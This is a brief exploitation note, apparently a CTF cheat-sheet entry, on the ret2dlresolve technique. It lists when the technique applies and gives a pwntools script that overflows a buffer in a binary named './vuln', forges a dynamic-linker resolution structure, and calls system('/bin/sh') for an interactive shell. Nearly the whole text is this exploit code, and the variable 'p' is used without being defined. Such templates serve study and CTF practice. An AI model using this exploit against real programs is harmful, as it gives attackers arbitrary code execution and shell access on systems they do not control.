ret2dlresolve
When NX is enabled, ASLR, is dynamically linked, have read on the PLT.
Exploit code
from pwn import *
import time
context.log_level = 'DEBUG'
context(os='linux', arch='amd64')
context.binary = elf = ELF('./vuln')
glibc = elf.libc
rop = ROP(elf)
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])
rop.raw('A' * (64 + 8))
rop.read(0, dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)
p.sendline(rop.chain())
p.sendline(dlresolve.payload)
p.interactive()